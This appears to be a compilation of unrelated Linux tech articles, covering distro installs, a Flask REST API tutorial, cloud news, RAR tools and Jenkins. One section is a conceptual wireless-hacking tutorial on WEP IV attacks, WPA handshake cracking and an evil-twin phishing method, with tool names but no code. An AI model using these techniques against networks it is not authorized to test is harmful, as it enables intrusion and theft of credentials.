Debian 8.8 MATE Installation on Oracle VirtualBox

Debian 8.8 MATE Installation on VirtualBox
Debian GNU/Linux 8.8 MATE Installation on Oracle VirtualBox

This video tutorial shows

Debian 8.8 MATE Desktop installation

on

Oracle VirtualBox

step by step. This tutorial is also helpful to install Debian 8.8 on physical computer or laptop hardware. We also install Guest Additions on Debian 8.8 MATE Desktop for better performance and usability features: Automatic Resizing Guest Display, Shared Folder, Seamless Mode and Shared Clipboard, Improved Performance and Drag and Drop.

Debian GNU/Linux 8.8 MATE Desktop Installation Steps:

  1. Create Virtual Machine on Oracle VirtualBox
  2. Start Debian 8.8 MATE Desktop Installation
  3. Install Guest Additions
  4. Test Guest Additions Features: Automatic Resizing Guest Display and Shared Clipboard

Installing Debian 8.8 MATE Desktop on Oracle VirtualBox

 

Debian 8.8 New Features and Improvements

Debian GNU/Linux 8.8

mainly adds corrections for security problems to the stable release, along with a few adjustments for serious problems. Security advisories were already published separately and are referenced where available. Those who frequently install updates from security.debian.org won’t have to update many packages and most updates from security.debian.org are included in this update. Debian 8.8 is not a new version of Debian. It’s just a Debian 8 image with the latest updates of some of the packages. So, if you’re running a Debian 8 installation with all the latest updates installed, you don’t need to do anything.

Debian Website:

https://www.debian.org/

What is MATE Desktop?

The MATE Desktop Environment is the continuation of GNOME 2. It provides an intuitive and attractive desktop environment using traditional metaphors for Linux and other Unix-like operating systems. MATE is under active development to add support for new technologies while preserving a traditional desktop experience.

MATE Desktop Website:

http://mate-desktop.com/

Hope you found this Debian 8.8 MATE Desktop installation on Oracle VirtualBox tutorial helpful and informative. Please consider sharing it. Your feedback and questions are welcome!

Source

How to install Ubuntu 18.04 LTS

(Last Updated On: September 1, 2018)

PREPARATION

1. Create bootable DVD or USB media.

* Download ISO image from https://www.ubuntu.com/download/desktop
* You can burn a bootable DVD in Windows 7 and up simply by inserting a blank DVD and then double-clicking the ISO file.
* Creating a bootable USB drive will require you to install software. Find out more here: https://tutorials.ubuntu.com/tutorial/tutorial-create-a-usb-stick-on-windows#0 for Windows users and https://tutorials.ubuntu.com/tutorial/tutorial-create-a-usb-stick-on-macos#0 for Mac users.

2. Boot Ubuntu 18.04

* You will have to turn off Secure Boot in your computer’s BIOS settings to be able to boot from a DVD or USB drive.
* Once you get Ubuntu booted, select “Try Ubuntu” and take time to play around and ensure that all of you hardware is working properly.
* Check to see if you will need any proprietary drives for your system.

3. Backup ALL Data You Wish To Keep!

* Do NOT use commercial backup software or the built-in Windows backup utility! Ubuntu MUST be able to read the files you create.
* Backups MUST be stored on a USB drive or other removable media.
* It is OK to store backup data in a Zip file. Ubuntu can open them with Archive Manager.

INSTALLATION

WARNING! Proceed at your own risk. Installing Ubuntu will wipe out your current Windows installation and all data you have stored on the computer. There is no way to “uninstall” Ubuntu!
* It is a good idea to have another computer, smartphone or tablet available so you can have access to the Internet in case you need to look something up.
* Turn off Secure Boot in your computer’s BIOS settings.
* Hook computer to the Internet with an Ethernet cable if drivers will be needed to use Wi-Fi.
* Boot Ubuntu
* Launch Ubuntu’s installer and follow the directions.
* Restart the computer. You are now Running Ubuntu!

POST-INSTALLATION SETUP

* Review and change settings for Software Updater.
* Change to local mirrors (Optional)
* Install ALL updates and restart the computer.
* Check for and install drivers.
* Restart the computer again.
* Install GNOME Tweaks
sudo apt install gnome-tweak-tool
* Configure the Desktop
* Setup Timeshift:
sudo apt-add-repository -y ppa:teejee2008/ppa
sudo apt install timeshift
* Optional: Install Google Chrome browser: https://www.google.com/chrome/index.html
Here’s how to activate and install GNOME Extensions with Chrome and Firefox: https://linuxconfig.org/how-to-install-gnome-shell-extensions-on-ubuntu-18-04-bionic-beaver-linux
* Install Ubuntu Restricted Extras:
sudo apt install ubuntu-restricted-extras
* Remove Fkuendo mp3 codec:
sudo apt remove gstreamer1.0-fluendo-mp3
* Install GNOME Tracker for faster file operations in Nautilus:
sudo apt install tracker
* Update locate command database to activate search function. ( This command will be run automatically in about a day or so. Running it now is optional.)
sudo updatedb

More recommended software:
sudo apt install htop gdebi synaptic net-tools

Ubuntu is now fully ready to use. Have fun!

Please be sure to give EzeeLinux a ‘Like’ on Facebook! Thanks! https://www.facebook.com/EzeeLinux

Joe Collins

Joe Collins worked in radio and TV stations for over 20 years where he installed, maintained and programmed computer automation systems. Joe also worked for Gateway Computer for a short time as a Senior Technical Support Professional in the early 2000’s and has offered freelance home computer technical support and repair for over a decade.

Joe is a fan of Ubuntu Linux and Open Source software and recently started offering Ubuntu installation and support for those just starting out with Linux through EzeeLinux.com. The goal of EzeeLinux is to make Linux easy and start them on the right foot so they can have the best experience possible.

Joe lives in historic Portsmouth, VA in a hundred year old house with three cats, three kids and a network of computers built from scrounged parts, all happily running Linux.

Source

Creating REST API in Python

REST or Representational State Transfer is a software development style used mainly in API or Application Programming Interface design to build interactive and modern web services. It is also known as RESTful web service.

Python is a powerful programming language. It has many libraries for building REST or RESTful APIs. One of the popular library for building web apps and writing REST APIs is Flask.

In this article, I will show you how to create REST API in Python using Flask. Let’s get started.

You should have

  • Python 2 or Python 3 installed on your computer.
  • PIP or PIP3 installed on your computer.
  • The basic understanding of Python programming language.
  • The basic understanding of executing commands in the shell.

You should be able to find articles and tutorials on all these topics on LinuxHint.com

I will be using Python 3 on Debian 9 Stretch in this article. If you’re using Python 2, you will have to adjust a little bit. You should be able to figure it out yourself as it will be simple as writing python instead of python3 and pip instead of pip3.

Setting Up Virtual Environment:

To put it simply, virtual environment is used to isolate one Python app from another. The Python package used to do that is virtualenv.

You can easily install virtualenv using PIP on your computer with the following command:

$ sudo -H pip3 install virtualenv

Now create a project directory (let’s call it pyrest/) with the following command:

Now create a Python virtual environment on the pyrest/ project directory with the following command:

Now navigate into the project directory with the following command:

Then, activate the Python virtual environment with the following command:

Finally, run the following command to install the Flask Python library:

Writing Your First Flask Script:

In this section, I will write a hello world program in Python Flask.

First, create a file hello.py in your project directory:

Now add the following lines to hello.py file and save it.

In the next section, I will show you how to run Flask scripts.

Running Flask Script:

Now to start the hello.py Flask server, run the following command:

As you can see, the server has started on http://127.0.0.1:8080.

Now, you can access the Flask server http://127.0.0.1:8080 from the web browser or API testing softwares such as Postman. I am going to use CURL.

$ curl http://127.0.0.1:8080

As you can see, the correct output is printed on the screen.

Congrats! Flask is working.

Accessing Data Using GET in REST API:

GET request on REST API is used to fetch information from the API server. You set some API endpoints and do a GET request on that end point. It’s simple.

First, create a new file get.py in your project directory with the following command:

Now add the following lines in your get.py file and save it.

Here, on line 1, the Flask constructor function and jsonify function is imported from the flask module.

On line 3, a Flask object is created and stored on app variable.

On line 5, I created a Python array of dictionaries of some dummy data and stored it in the accounts variable.

On line 10, I defined the API endpoint /accounts and the request method, which is GET.

On line 11, I defined the function getAccounts(). getAccounts() function will execute when a GET request to /accounts endpoint is made.

Line 12, which is a part of getAccounts() function, I converted the accounts array of dictionaries to JSON using jsonify() function and returned it.

On line 14-15, I called the app.run() to tell Flask to run the API server on port 8080.

Now run the Flask API server with the following command:

The server has started on port 8080.

Now make a GET request to the /accounts endpoint with CURL as follows:

$ curl http://127.0.0.1:8080/accounts

As you can see, the accounts data is displayed as JSON format on GET request on /accounts endpoint.

You can also get specific account data as well. To do that, I am going to create another API endpoint /account/<id>. Here, <id> will be the ID the account holder. The ID here is the index of the array.

Edit the get.py script and add the marked lines to it.

Here, on line 14, I defined the API endpoint /account/<id> and the method to be used, which is GET.

On line 15-17, the function getAccount() for the API endpoint /account/<id> is defined. The getAccount() function accepts a id as an argument. The value of <id> from the API endpoint is set to the id variable of getAccount() function.

On line 16, the id variable is converted to an integer. I also deduced 1 from the id variable. Because the array index starts from 0. I want to start the account ID from 1. So if I put 1 as the account <id>, 1 – 1 = 0, I will get the element at index 0 from the array accounts.

On line 17, the array at index <id> is returned as JSON.

The rest of the codes are the same.

Now run the API server again.

I requested data for account 1 and 2 separately and I got the expected output as you can see from the screenshot below.

$ curl http://127.0.0.1:8080/account/1
$ curl http://127.0.0.1:8080/account/2

Adding Data Using POST in REST API:

Now I am going to rename get.py to api.py and add an API endpoint /account for adding new data.

Rename get.py to api.py:

First, add the lines (19-26) as marked in the screenshot below to the api.py file.

Now run the api.py server:

To insert new data into the /account endpoint, run the following command:

$ curl -X POST -H “Content-Type: application/json” -d ‘{“name”: “Shovon”, “balance”: 100}’
http://127.0.0.1:8080/account

NOTE: Here, ‘{“name”: “Shovon”, “balance”: 100}’ is the JSON input data.

The data should be inserted.

As you can see, the new data is added.

So that’s it for this article. Thanks for reading this article.

Source

Google Adds Kubernetes to Rebranded Cloud Marketplace | Enterprise

Google Adds Kubernetes to Rebranded Cloud Marketplace

Google’s goal is to make containers accessible to everyone, especially the enterprise, according to Anil Dhawan, product manager for the Google Cloud Platform.

When Google released Kubernetes as open source, one of the first challenges that the industry tackled was management, he said.

Google’s hosted Kubernetes Engine takes care of cluster orchestration and management. A bigger challenge to getting apps running on a Kubernetes cluster can be a manual, time-consuming process. GCP Marketplace provides prepackaged apps and deploys them onto any cluster, Dhawan noted.

Google makes the process safer by testing and vetting all Kubernetes apps listed on GCP Marketplace. That process includes vulnerability scanning and partner agreements for maintenance and support.

The security umbrella extends to all solutions available through the marketplace. That includes virtual machines, managed services, data sets, application programming interfaces, and Software as a Service.

The name change at one level is purely an effort to heighten the visibility of the Google Cloud Platform brand and to point attention to the new marketplace for ready-to-deploy apps, suggested Charles King, principal analyst at Pund-IT.

“Ideally, it will move interested businesses toward the marketplace, meaning that developers will see improved sales of their apps for GCP,” he told LinuxInsider.

More Behind the Move

Ultimately, Google’s enterprise cloud platform rebranding should make life easier for people managing container environments, said King. That will be the case especially if they happen to be studying or considering apps to buy and deploy.

“The impact on hybrid/multicloud is a bit harder to parse, though,” said King. “If the effort succeeds, it should impact Google’s GCP-related sales and business for the better.”

Google’s marketing move could be important for the future of hybrid and multicloud strategies, said Glen Kosaka, vice president of product at Kubernetes security firm
NeuVector.

“This is one really important step towards supporting and simplifying app deployment across clouds,” he told LinuxInsider.

Further, developers now have access to apps that can boost their own apps without having to worry about production deployment and scaling issues, noted Kosaka.

That should be a big deal to many devs, he added.

“Container management of marketplace apps now becomes more simplified, and customers — those responsible for container management — have the confidence that these Google Marketplace apps are tested and compatible with their cloud infrastructure,” Kosaka said.

Broader View Counts

Looking at the news in a strict and narrow sense, Google’s action appears to be little more than a rebranding witha clearer, more descriptive name. That is a fairly sensible move, suggested Alex Gounares, CEO of
Polyverse.

“From a broader perspective, this is the proverbial tip of the iceberg around a series of much bigger industry shifts to server-less computing and Containers as a Service,” he told LinuxInsider.

For one thing, Google’s rebranded platform means changes for developers. In the Internet’s early years, you had to build your own data centers, and build and manage your own applications. Effectively, everything was hand-built, on-premises and expensive, Gounares explained.

Then Salesforce.com came along, and the Software as a Service revolution was born. The same apps could be run in the cloud and delivered via a Web page.

That led to Amazon Web Services and to other cloud services providers letting folks effectively rent a data center on demand — the Infrastructure as a Service revolution.

For the application developer, physically acquiring the *hardware* became trivial, but from a software perspective, actually getting everything set up, configured, and running essentially was just as complicated as running things on premises, said Gounares.

Big Deal for Devs

Containers have revolutionized that. Now all of the complexity of something like a database or content management system or similar software can be packaged in a neat little box, according to Gounares.

That box can run alongside all the other pieces needed for a full solution. Configuration and management that used to take days or weeks to accomplish now can be done in a single command line.

“Renaming the service to address making one-click deployment of containers, and to open up new business models for software platform technology is a big, big, big deal,” remarked Gounares. “It is doing for software what Amazon AWS did for hardware and data centers.”

Deployment Factors

A big advantage to containers is their portability across environments. Users can develop their content and then move their workloads to any production environment, noted Google’s Dhawan.

Google works with open source Special Interest Groups, or SIGs, to create standards for Kubernetes apps. This brings the expertise of the open source community to the enterprise.

Google’s enhanced cloud platform speeds deployment on Kubernetes clusters, Kubernetes Engine, on-premises servers or other public clouds. A Marketplace window displays directly in the Kubernetes Engine console. That process involves clicking-to-deploy and specifying the location.

Third-party partners develop commercial Kubernetes apps, which come with support and usage-based billing on many parameters, such as API calls, number of hosts, and storage per month.

Google uses simplified license usage and offers more consumption options. For instance, the usage charges for apps are consolidated and billed through GCP, no matter where they are deployed. However, the non-GCP resources on which they run are not included, according to Dhawan.

A Win-Win Proposition

It is going to be orders of magnitude easier for developers to deploy both commercial and open source applications on Kubernetes. The launch of GCP Marketplace solves problems around scalability, operating in a virtual private cloud, and billing, noted Dan Garfield, chief evangelist at
Codefresh.

“For example, with Codefresh, our users can deploy our hybrid agent on Kubernetes so they can build on their own clusters, access code in their virtual private network, and bill everything through Google,” he told LinuxInsider. “As a third party, this makes the billing PO approval process a lot easier with enterprise customers where you normally have to become an approved vendor.”

For those responsible for container management, DevOps teams can consume “official” versions of software built for Kubernetes and keep them up to date, he added. This is especially important when you consider the security issues people have had with Dockerhub.

“The GCP Marketplace supports much more complex software stacks, and you can get the official packages rather than whatever someone has built and pushed to Dockerhub,” Garfield said.

What’s Available

GCP Marketplace features popular open source projects that are ready to deploy into Kubernetes. Each app includes clustered images and documented upgrade steps. This makes them ready to run in production. Packaged and maintained by Google Cloud, they implement best practices for running on Kubernetes Engine and GCP, according to Google.

Here is a sampling of some of the hundreds of apps featured on the GCP Marketplace:

  • WordPress for blogging and content management;
  • InfluxDB, Elasticsearch and Cassandra for big data and database;
  • Apache Spark for big data/analytics;
  • RabbitMQ for networking; and
  • NGinx for Web serving.

A complete listing of apps available on the GCP Marketplace is
available here. No signup is needed to view the full list of available solutions.

Good for Hybrid and Multicloud Too

Anything that creates an additional wave of cloud-native applications is really great for the entire cloud marketplace. This includes different public cloud vendors, private cloud solutions, and even edge computing vendors, according to Roman Shaposhnik, VP for product & strategy at
Zededa.

“The platform can only be as successful as the number of killer apps that it hosts. This move by Google creates just the right kind of dynamics to get us the next crop of candidates for a killer cloud-native app,” he told LinuxInsider.

Hybrid cloud and multicloud deployments still have some way to go, however. What is missing is a way for seamlessly stretching container orchestrators across geographically distant locations, suggested Gaurav Yadav, founding engineering and product manager at
Hedvig.

“Unless we standardize container management operations across data centers and cloud locations separated by an unreliable network, true cloud-agnostic applications will always be hard to materialize,” he told LinuxInsider.

VMware became the de facto standard for virtual machine management because it took it out of the hands of admins, Yadav said. VMware made it simple, automated and scalable.

“For cloud-native applications, containers have the potential of replacing VMs as the standard for resource virtualization,” he suggested. “This is only possible if we bring the advanced capabilities that have been built over a decade for VM orchestration to the container management. This announcement is the next step towards this goal.”

The Right Move

Fundamentally, Google’s actions create a huge incentive for developers to transition their apps to a cloud-native architecture, said Zededa’s Shaposhnik.

“I would expect all of these to start being refactored and packaged for the GCP Marketplace,” he said, “and that is a good thing that goes way beyond immediate value on Google’s own cloud. Once an application is refactored and packaged to be truly cloud-native, you can transition between different clouds — including on-premises private clouds — in a much easier fashion.”

For container management, it is “yet another move in the right direction of making containers a ubiquitous, but completely invisible part of the IT infrastructure,” Shaposhnik added.

The Bottom Line

The changes that Google implemented are good news for developers, said Oleg Atamanenko, lead platform developer at
Kublr.

“It is a big step towards simplifying the experience when trying new applications,” he told LinuxInsider.

For IT management, on the other hand, the changes in Google’s GCP Marketplace mean cost reduction, reduced time-to-market, and faster innovation through streamlining application installation, Atamanenko said.

For developers, a change in name means little, but the direction Google has taken means a step forward in the enterprise world, said Stefano Maffulli, community director at
Scality.

Still, there is a down side, he told LinuxInsider.

Bitnami, which has been pushing to be the packaging tool to ship applications to the clouds, added support for Kubernetes early on.

“Now Google is making them less relevant on GCP, which can be a threat,” said Maffulli. “I wonder how long Bitnami and Google will stay partners.”

Jack M. Germain has been an ECT News Network reporter since 2003. His main areas of focus are enterprise IT, Linux and open source technologies. He has written numerous reviews of Linux distros and other open source software.
Email Jack.

Source

Things You Should Know : Wireless Hacking Intermediate

In the previous post in the ‘things you should know’ series I discussed Wireless Hacking basics. It’s recommended that you go through it before starting this tutorial.

Pre-requisites

You should know (all this is covered in Wireless Hacking basics)-

  • What are the different flavors of wireless networks you’ll encounter and how difficult it is to hack each of them.
  • What are hidden networks, and whether they offer a real challenge to a hacker.
  • Have a very rough idea how each of the various ‘flavors’ of wireless networks is actually hacked.

Post-reading

You will know –

  • Know even more about different flavors of wireless networks.
  • How to go about hacking any given wireless network.
  • Common tools and attacks that are used in wireless hacking.

The last two points would be covered in detail in the coming posts.
A rough idea about the cryptographic aspects of the attacks, the vulnerabilities and the exploits.
A rough idea about the cryptographic aspects of each ‘flavor’ of wireless network security.

Pirates of the Caribbean

Suppose you are in ship manufacturing business.
These are times when pirates were rampaging the seas. You observed how the
merchant ships are all floating unguarded in the seas, and the pirate industry is
booming because of easy targets. You decide to create fortified ships,
which can defend themselves against the pirates. For this, you use an alloy
X. Your idea was appreciated by merchants and everyone started using your ships….

The most iconic pirates of modern times

Unfortunately, your happiness was short lived. Soon, the pirates found out flaws in
your ships and any pirate who knew what he was doing could easily get
past your ship’s defense mechanisms. For a while you tried to fix the
known weaknesses in the ship, but soon realized that there were too many
problems, and that the very design of the ship was flawed.

You knew what flaws the pirates were exploiting, and could build a new and stronger ship. However, the merchants weren’t willing to pay for new ships. You
then found out that by remodeling some parts of the ship in a very
cost efficient way, you could make the ship’s security almost
impenetrable. In the coming years, some pirates found a few structural
weaknesses in alloy X, and some issues with the core design of the ship (remnant weaknesses of the original ship). However,
these weaknesses were rare and your customers were overall happy.

After
some time you decided to roll out an altogether new model of the ship. This time,
you used a stronger allow, Y. Also, you knew all the flaws in the
previous versions of the ship, and didn’t make any errors in the design
this time. Finally, you had a ship which could withstand constant
bombardment for months on end, without collapsing. There was still scope
for human error, as the sailors can sometimes be careless, but other
than that, it was an invincible ship.

WEP, WPA and WPA-2

WEP is the flawed ship in the above discussion. The aim of Wireless Alliance was to write an algorithm to make wireless network (WLAN) as secure as wired networks (LAN). This is why the protocol was called Wired Equivalent Privacy (privacy equivalent to the one expected in a traditional wired network). Unfortunately, while in theory the idea behind WEP sounded bullet-proof, the actual implementation was very flawed. The main problems were static keys and weak IVs. For a while attempts were made to fix the problems, but nothing worked well enough(WEP2, WEPplus, etc. were made but all failed).

WPA was a new WLAN standard which was compatible with devices using WEP encryption. It fixed pretty much all the flaws in WEP encryption, but the limitation of having to work with old hardware meant that some remnants of the WEPs problems would still continue to haunt WPA. Overall, however, WPA was quite secure. In the above story, this is the remodeled ship.

WPA-2 is the latest and most robust security algorithm for wireless networks. It wasn’t backwards compatible with many devices, but these days all the new devices support WPA-2. This is the invincible ship, the new model with a stronger alloy.

But wait…

In last tutorial I assumed WPA and WPA-2 are the same thing. In this
one, I’m telling you they are quite different. What’s the matter?

Well actually, the two standards are indeed quite different. However, while it’s true there are some remnant flaws in WPA that are absent in WPA-2, from a hacker’s perspective, the technique to hack the two networks is often the same. Why?

 

  • Very few tools exist which carry out the attacks against WPA networks properly (the absence of proof-of-concept scripts means that you have to do everything from scratch, which most people can’t).
  • All these attacks work only under certain conditions (key renewal period must be large, QoS must be enabled, etc.)

Because of these reasons, despite WPA being a little less secure than WPA-2, most
of the time, a hacker has to use brute-force/dictionary attack and other
methods that he would use against WPA-2, practically making WPA and
WPA-2 the same thing from his perspective
.

PS: There’s more to the WPA/WPA-2 story than what I’ve captured here. Actually WPA or WPA-2 are ambiguous descriptions, and the actual intricacy (PSK, CCMP, TKIP, X/EAP, AES w.r.t. cipher used and authentication used) would required further diving into personal and enterprise versions of WPA as well as WPA-2.

How to Hack

Now that you know the basics of all these network, let’s get to how actually these networks are hacked. I will only name the attacks, further details would be provided in coming tutorials-

WEP

The Initialization vector v passed to the RC4 cipher is the
weakness of WEP

Most of the attacks rely on

inherent weaknesses in IVs

(initialization vectors). Basically, if you collect enough of them, you will get the password.

  1. Passive method
    • If you don’t want to leave behind any footprints, then passive method is the way to go. In this, you simply listen to the channel on which the network is on, and capture the data packets (airodump-ng). These packets will give you IVs, and with enough of these, you can crack the network (aircrack-ng). I already have a tutorial on this method, which you can read here – Hack WEP using aircrack-ng suite.
  2. Active methods
  • ARP request replayThe above method can be incredibly slow, since you need a lot of packets (there’s no way to say how many, it can literally be anything due the nature of the attack. However, usually the number of packets required ends up in 5 digits). Getting these many packets can be time consuming. However, there are many ways to fasten up the process. The basic idea is to initiate some sort of conversation in the network, and then capture the packets that arise as a result of the conversation. The problem is, not all packets have IVs. So, without having the password to the AP, you have to make it generate packets with IVs. One of the best ways to do this is by requesting ARP packets (which have IVs and can be generated easily once you have captured at least one ARP packet). This attack is called ARP replay attack. We have a tutorial for this attack as well, ARP request replay attack.
  • Chopchop attack
  • Fragmentation attack
  • Caffe Latte attack

I’ll cover all these attacks in detail separately (I really can’t sumarrize the bottom three). Let’s move to WPA-

WPA-2 (and WPA)

There are no vulnerabilities here that you can easily exploit. The only two options we have are to guess the password or to fool a user into giving us the password.

  1. Guess the password – For guessing something, you need two things : Guesses (duh) and validation. Basically, you need to be able to make a lot of guess, and also be able to verify if they are correct or not. The naive way would be to enter the guesses into the password field that your OS provides when connecting to the wifi. That would be slow, since you’d have to do it manually. Even if you write a script for that, it would take time since you have to communicate with the AP for every guess(that too multiple times for each guess). Basically, validation by asking the AP every time is slow. So, is there a way to check the correctness of our password without asking the AP? Yes, but only if you have a 4-way handshake. Basically, you need the capture the series of packets transmitted when a valid client connects to the AP. If you have these packets (the 4-way handshake), then you can validate your password against it. More details on this later, but I hope the abstract idea is clear. There are a few different ways of guessing the password :-
  • Bruteforce – Tries all possible passwords. It is guaranteed that this will work, given sufficient time. However, even for alphanumeric passwords of length 8, bruteforce takes incredibly long. This method might be useful if the password is short and you know that it’s composed only of numbers.
  • Wordlist/Dictionary – In this attack, there’s a list of words which are possible candidates to be the password. These word list files contains english words, combinations of words, misspelling of words, and so on. There are some huge wordlists which are many GBs in size, and many networks can be cracked using them. However, there’s no guarantee that the network you are trying to crack would have it’s password in the list. These attacks get completed within a reasonable timeframe.
  • Rainbow table – The validation process against the 4-way handshake that I mentioned earlier involves hashing of the plaintext password which is then compared with the hash in handshake. However, hashing (WPA uses PBKDF2) is a CPU intensive task and is the limiting factor in the speed at which you can test keys (this is the reason why there are so many tools which use GPU instead of CPU to speed up cracking). Now, a possible solution to this is that the person who created the wordlist/dictionary that we are using can also convert the plaintext passwords into hashes so that they can be checked directly. Unfortunately, WPA-2 uses a salt while hashing, which means that two networks with the same password can have different hashing if they use different salts. How does WPA-2 choose the salt? It uses the network’s name (SSID) as the salt. So two networks with the same SSID and the same password would have the same salt. So, now the guy who made the wordlist has to create separate hashes for all possible SSID’s. Practically, what happens is that hashes are generated for the most common SSID’s (the default one when a router is purchases like -linksys, netgear, belkin, etc.). If the target network has one of those SSID’s then the cracking time is reduced significantly by using the precomputed hashes. This precomputed table of hashes is called rainbow table. Note that these tables would be significantly larger than the wordlists tables. So, while we saved ourselves some time while cracking the password, we had to use a much larger file (some are 100s of GBs) instead of a smaller one. This is referred to as time-memory tradeoff. This page has rainbow tables for 1000 most common SSIDs.

 

  • Fool a user into giving you the password – Basically this just a combination of Man in the middle attacks and social engineering attacks. More specifically, it is a combination of evil twin and phishing. In this attack, you first force a client to disconnect from the original WPA-2 network, then force him to connect to a fake open network that you create, and then send him a login page in his browser where you ask him to enter the password of the network. You might be wondering, why do we need to keep the network open and then ask for the password in the browser (can’t we just create a WPA-2 network and let the user give us the password directly). The answer to this lies in the fact that WPA-2 performs mutual authentication during the 4-way handshake. Basically, the client verifies that the AP is legit, and knows the password, and the AP verifies that the client is legit and knows the password (throughout the process, the password is never sent in plaintext). We just don’t have the information necessary enough to complete the 4-way handshake.
  • Bonus : WPS vulnerability and reaver [I have covered it in detail seperately so not explaining it again (I’m only human, and a very lazy one too)]

 

The WPA-2 4 way handshake procedure. Both AP and the client authenticate each other

Tools (Kali)

In this section I’ll name some common tools in the wireless hacking category which come preintalled in Kali, along with the purpose they are used for.

  1. Capture packets
  • airodump-ng
  • wireshark (really versatile tool, there are books just covering this tool for packet analysis)
  • WPS
  • reaver
  • pixiewps (performs the “pixie dust attack”)
  • Cool tools
  • aireplay-ng (WEP mostly)
  • mdk3 (cool stuff)
  • Automation
  • wifite
  • fluxion (actually it isn’t a common script at all, but since I wrote a tutorial on it, I’m linking it)

You can find more details about all the tools installed on

Kali Tools page

.

Okay guys, this is all that I had planned for this tutorial. I hope you learnt a lot of stuff. Will delve into further depths in coming tutorials.

Source

Stranded Deep adds a new experimental couch co-op mode to survive together

Fancy surviving on a desert island with a friend? That’s now possible with a new experimental build of Stranded Deep [Steam].

To go along with this new feature, they also added a Player Ragdoll for when you’re knocked out or dead. You partner can help you up with bandages before you bleed out and bodies can be dragged as well for maximum fun. It’s good to see them add more from their roadmap, with plenty more still to come before it leaves Early Access.

They also added a Raft Passenger Seat, fixed a bunch of bugs and updated Unity to “2017.4.13f1”. Also the shark music won’t play until you’re actually attacked so no more early warnings for you.

To access it, you will need to opt-in to the “experimental” Beta on Steam.

Source

Canta: Best Theme And Icons Pack Around For Ubuntu/Linux Mint – NoobsLab

If you are a person who changes themes on your Linux system frequently then you are on the right page. Today, we present you best theme under development so far for Ubuntu 18.04/Linux Mint 19, it has variants in light and dark with different styles: normal, compact and square. If you are a fan of material design or not, most probably you are going to like this theme and icons pack. The initial release of Canta was back in March, 2018 and released under GNU General Public License V3.

Canta theme

is based on Materia Gtk theme.

This pack mainly targets Gnome Shell desktop but can be used on other desktops as well such as: Cinnamon, Xfce, Mate etc. Canta icons are supplied with the same pack and designed by same author. Both themes and icons are available in our PPAs. Basically these icons are designed to go with this theme pack but you can use them with any theme. Using our PPA themes are available for Ubuntu 18.10/18.04 and Linux Mint 19. Icons available for Ubuntu 18.10/18.04/16.04/14.04/Linux Mint 19/18/17. If you find any kind of bug or problem with this theme then report it to author and it will get fixed in the next update.

canta theme


canta theme
canta theme
canta theme

Available for Ubuntu 18.10/18.04 Bionic/Linux Mint 19/and other Ubuntu derivatives
To install Canta themes in Ubuntu/Linux Mint open Terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:
Available for Ubuntu 18.10/18.04 Bionic/16.04 Xenial/14.04 Trusty/Linux Mint 19/18/17/and other Ubuntu derivatives
To install Canta icons in Ubuntu/Linux Mint open Terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:
Did you like this pack?

Source

How to Use RAR files in Ubuntu Linux

Last updated September 27, 2018

RAR is a quite good archive file format. But, it isn’t the best when you’ve got 7-zip offering great compression ratios and Zip files being easily supported across multiple platforms by default. It is one of the most popular archive formats, but, Ubuntu‘s archive manager does not support extracting RAR files nor does it let you create RAR files.

Fret not, we have a solution for you. To enable the support to extract RAR files, you need to install UNRAR – which is a freeware by RARLAB. And, to create and manage RAR files, you need to install RAR – which is available as a trial.

RAR files in Ubuntu Linux

Extracting RAR Files

Unless you have it installed, extracting RAR files will show you an error “Extraction not performed“. Here’s how it should look like (Ubuntu 18.04):

Error in RAR extraction in Ubuntu

If you want to resolve the error and easily be able to extract RAR files, follow the instructions below to install unrar:

-> Launch the terminal and type in:

sudo apt-get install unrar

-> After installing unrar, you may choose to type in “unrar” (without the inverted commas) to know more about its usage and how to use RAR files with the help of it.

The most common usage would obviously be extracting the RAR file you have. So, you can either perform a right-click on the file and proceed to extract it from there or you can do it via the terminal with the help of this command:

unrar x FileName.rar

You can see that in action here:

Using unrar in Ubuntu

If the file isn’t present in the Home directory, then you have to navigate to the target folder by using the “cd” command. For instance, if you have the archive in the Music directory, simply type in “cd Music” to navigate to the location and then extract the RAR file.

Creating & Managing RAR files

Using rar archive in Ubuntu Linux

UNRAR does not let you create RAR files. So, you need to install the RAR command-line tool to be able to create RAR archives.

To do that, you need to type in the following command:

sudo apt-get install rar

Here, we will help you create a RAR file. In order to do that, follow the command syntax below:

rar a ArchiveName File_1 File_2 Dir_1 Dir_2

When you type a command in this format, it will add every item inside the directory to the archive. In either case, if you want specific files, just mention the exact name/path.

By default, the RAR files reside in HOME directory.

In the same way, you can update/manage the RAR files. Just type in a command using the following syntax:

rar u ArchiveName Filename

To get the list of commands for the RAR tool, just type “rar” in the terminal.

Wrapping Up

Now that you’ve known how to use RAR files on Ubuntu, will you prefer using it over 7-zip, Zip, or Tar.xz?

Let us know your thoughts in the comments below.

About Ankush Das

A passionate technophile who also happens to be a Computer Science graduate. He has had bylines at a variety of publications that include Ubergizmo & Tech Cocktail. You will usually see cats dancing to the beautiful tunes sung by him.

Source

Download Jenkins Linux 2.147

Jenkins (also known as Jenkins CI) is the world’s most powerful open source continuous integration server designed from the offset to provide over 300 plugins for building and testing any software project. It is a web-based application that runs on top of a web server, such as Apache.

Features at a glance

With Jenkins, you can monitor the execution of repeated jobs, including those run by cron or a similar automation software. It is easily installable, configurable and supports third-party plugins, distributed builds, as well as file fingerprinting.

In addition, Jenkins’ highlights include after-the-fact tagging, JUnit and TestNG test reporting, support for permanent links, support for mainstream operating systems and architectures, change set support, RSS, Instant Messaging and email integration.

Getting started with Jenkins

Jenkins is an easy-to-use and easy-to-install software project, but it has a great number of advanced feartures, for which its developers offer a detailed getting started with Jenkins guide, teaching you how to start, access and administering Jenkins, as well as to do various operations.

For example, you will learn how to build a software project, a Maven project, a matrix project, an Android app, monitor external jobs, use Jenkins plugins, file fingerprint tracking, secure Jenkins, change the timezone, use other shells, split a large job in smaller pieces, use Jenkins for non-Java projects, as well as to access the Jenkins script console, the command-line interface and SSH (Secure Shell).

Additionally, the user will learn how to integrate Jenkins with Drupal, Python, Perl and .NET projects, remove and disable third-party plugins, run Jenkins from behind a HTTP/HTTPS proxy, and many other useful things.

Supported operating systems

Being designed for the Web, Jenkins is a platform-independent application that has been successfully tested on several GNU/Linux distributions, including Ubuntu, Debian, Red Hat Enterprise Linux, Fedora, CentOS, openSUSE and Gentoo, various BSD flavors, including FreeBSD and OpenBSD, Solaris (OpenIndiana), Microsoft Windows and Mac OS X operating systems.

Continuous integration server Continuous integration CI server Continuous Integration Server CI

Source

